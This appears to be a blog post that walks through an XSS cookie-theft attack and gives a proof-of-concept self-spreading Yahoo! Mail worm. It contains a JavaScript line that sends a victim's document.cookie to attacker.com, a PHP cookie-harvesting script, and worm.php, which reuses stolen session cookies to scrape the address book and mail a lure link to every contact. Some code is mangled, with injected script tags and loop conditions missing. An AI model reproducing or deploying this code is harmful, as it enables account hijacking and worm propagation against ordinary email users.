XSS Attack - Yahoo! Worm - Mail PoC
Disclaimer :
This is a PoC and it was created in educational purpose only. The author ( ME ) could not be held responsible if the PoC doesn't work or is used in different purpose's!
1. DESCRIPTION
Using Cross Site Scripting ( XSS ) attack's give's us the possiblity to impersone one legitim user ( victim ) that is a registered on a website ( target )
In this tutorial will suppose the target site has a XSS vulnerability which give's an attacker to inject a "bad code" into a page.
First, let's follow this step's :
a. The victim certify's on the target site
b. The attacker send's a link to a page ( with the "bad code" ) from the target site to the victim
c. The victim navigate's to the page
d. The page code load's a script from another location sending the victim's cookies
e. The script use's this cookie to act like the victim on target site
I'll illustrate now ( with example's ) :
We suppose the victim is allready certifyed on the target site
The target has a XSS vulnerability :
CODE
http://www.target.com/page.php?var=
The attacker send's the link to his victim :
"
CODE
http://www.target.com/page.php?var=
"
When the victim follow's the link; the script "js.js" is loaded and executed by the browser
Code:
CODE
new Image().src='http://www.attacker.com/php.php?cookie= '+escape(document.cookie);
The file "js.js" contain's a code which does a request to the file "php.php" - controled by the attacker.
===== php.php =====
Code:
CODE
$domain=".target.com"; // cookie domain $cookie=$_GET['cookie']; //we create the file , supposeing the cookie session has more sequence's "name=value; " $hcook=fopen("cookie.txt","w"); $params=split('; ',$cookie); for($i=0; $i { $eqpos=strpos($params[$i],"="); $name =substr($params[$i],0,$eqpos); $value=substr($params[$i],$eqpos+1,strlen($params[$i])); fwrite($hcook,$domain. " TRUE / FALSE 9999999999 ".$name." ".$value." "); } fclose($hcook); // we make any curl request useing "cookie.txt" as CURLOPT_COOKIEFILE and CURLOPT_COOKIEJAR ?>
The "php.php" file is esential to this kind of attack.
This steal's the victim's cookie and use's it to look like the victim on the target site. The reason for useing a php script in place of a javascript is to pass the javascript polics, haveing the possibility if requesting to anykind of domain where the cookie is valid. We can receive and send data to the target site and manipulate in any kind of mode.
2. YAHOO! MAIL Worm PoC
Will suppose that Yahoo! has a XSS vulnerability like the following form :
"http://xxx.yahoo.com/page?var="
a. The attacker send's an emails containing the link to http://xxx.yahoo.com/page?var= to the victim
b. The victim follow's the link ( Ok, pause. Let's name the victim BILL )
c. "worm.php" file is stealing BILL's cookie and useing it to send a mail to every person from his Address Book
d. The person's from BILL's Address Book become victim's when they follow the link from the email, which seeming to come from a victim
===== worm.php =====
Code:
QUOTE
$subject="Link for you"; // message subject $message ="Look a cool link, CLICK ME!"; // message body // We eliminate the need of a "js.js" file checking the parameter value of "cookie" // If this doesn't exist we type the content of "js.js" file // and if exist's we continue with "php.php" if(!isset($_GET['cookie'])) { $scripturl="http://".$HTTP_HOST.$REQUEST_URI; print("new Image().src='".$scripturl."?cookie='+escape(document.cookie);"); } else { $cookie=$_GET['cookie']; // We create a unique name for the file were we'll save the cookie ensureing this way // that when a lot of victim's access simultaneuously the script; the cookie's will not overwrite $cookiefile=rand(100,999).".txt"; // we create the cookie file $hcook=fopen($cookiefile,"w"); $params=split('; ',$cookie); for($i=0; $i { $eqpos=strpos($params[$i],"="); $name =substr($params[$i],0,$eqpos); $value= substr($params[$i],$eqpos+1,strlen($params[$i])); fwrite($hcook,".yahoo.com TRUE / FALSE 9999999999 ".$name." ".$value." "); } fclose($hcook); // We try the Yahoo! address book for data extraction all about the contact's and create a variable of the form // "contact1@yahoo.com,contact2@yahoo.com, etc.." as well finding the domain us.fXXX.mail.yahoo.com // which change's each time there is a certify! $address=curl("http://address.mail.yahoo.com/","",$cookiefile); if(strpos($address,"Yahoo! Address Book")==true) // if the page was loaded correctly { $apage=explode(" ",$address); foreach($apage as $line_num => $aline) { if(strstr($aline,"ymsgr:sendIM")) { $ex =explode("?",$aline); $ex2=explode(""",$ex[1]); $id=$ex2[0]; $to=$to.$ex2[0]."@yahoo.com,"; } if(strstr($aline,"Compose")) { $ex3=explode("/",$aline); $domain="http://".$ex3[2]; } } } // We load the "Compose" formular situaten on us.fXXX.mail.yahoo.com for finding the formular's action // to send email and parameter value ".crumb" which we need for sending message's if(strlen($to)>0 && strlen($domain)>0) // if we have the 2 variable's { $compose= curl($domain."/ym/Compose?","",$cookiefile); if(strpos($compose,"Yahoo! Mail")==true) // if the page was loaded correctly { $cpage=explode(" ",$compose); foreach($cpage as $line_num => $cline) { if(strstr($cline,"form name="Compose"")) { $ex4=explode(""",$cline); $action=$ex4[5]; } if(strstr($cline,".crumb")) { $ex6=explode(""",$cline); $crumb=$ex6[3]; } } } if(strlen($action)>0 && strlen($crumb)>0) // if we have the 2 variable's { $subject=str_replace(" ","+",$subject); $message=str_replace(" ","+",$message); // we generate POSTFIELDS for curl $post ="SEND=1&SD=&SC=&CAN=&docCharset= iso-8859-1&PhotoMailUser=&PhotoToolInstall=&"; $post.="OpenInsertPhoto=&PhotoGetStart= 0&SaveCopy=no&PhotoMailInstallOrigin=&"; $post.="box=&.crumb=".$crumb."&"; $post.="FwdFile=&FwdMsg=&FwdSubj=&FwdInline= &OriginalFrom=&OriginalSubject=&"; $post.="InReplyTo=&NumAtt=0&AttData=&UplData= &OldAttData=&OldUplData=&FName=&"; $post.="ATT=&VID=&Markers=&NextMarker= 0&Thumbnails=&PhotoMailWith=&BrowseState=&"; $post.="PhotoIcon=&ToolbarState=&VirusReport= &Attachments=&BGRef=&BGDesc=&BGDef=&"; $post.="BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom= &PlainMsg=&PhotoFrame=&PhotoPrintAtHomeLink=&"; $post.="PhotoSlideShowLink=&PhotoPrintLink= &PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&"; $post.="PhotoDownloadUrl=&PhotoSaveUrl= &PhotoFlags=&start=compose&bmdomain=&hidden=showcc&"; $post.="showbcc=&AC_Done=&AC_ToList= &AC_CcList=&AC_BccList=&sendtop=Send&"; $post.="savedrafttop=Save+as+a+Draft&canceltop= Cancel&To=".$to."&Cc=&Bcc=&"; $post.="Subj=".$subject."&Body=".$message."&Format= html&SigAtt=1&sendbottom=Send&"; $post.="savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&"; // sending the mail's $mail=curl($domain.$action,$post,$cookiefile); } } unlink($cookiefile); } function curl($url,$post='',$cookiefile) // function to easy the curl request's { $rand=rand(100000,400000); $agent="Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/".$rand." Netscape/7.1 (ax)"; $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_USERAGENT,$agent); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); if($post!=='') { curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_POSTFIELDS,$post); } curl_setopt($ch,CURLOPT_COOKIEFILE,$cookiefile); curl_setopt($ch,CURLOPT_COOKIEJAR,$cookiefile); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE); $result=curl_exec($ch); curl_close($ch); if($result=="") { curl($url,$post); } else { return $result; } } ?>
Thank's for reading and hope you learned something
Subscribe to:
Post Comments (Atom)
Posts
No comments:
Post a Comment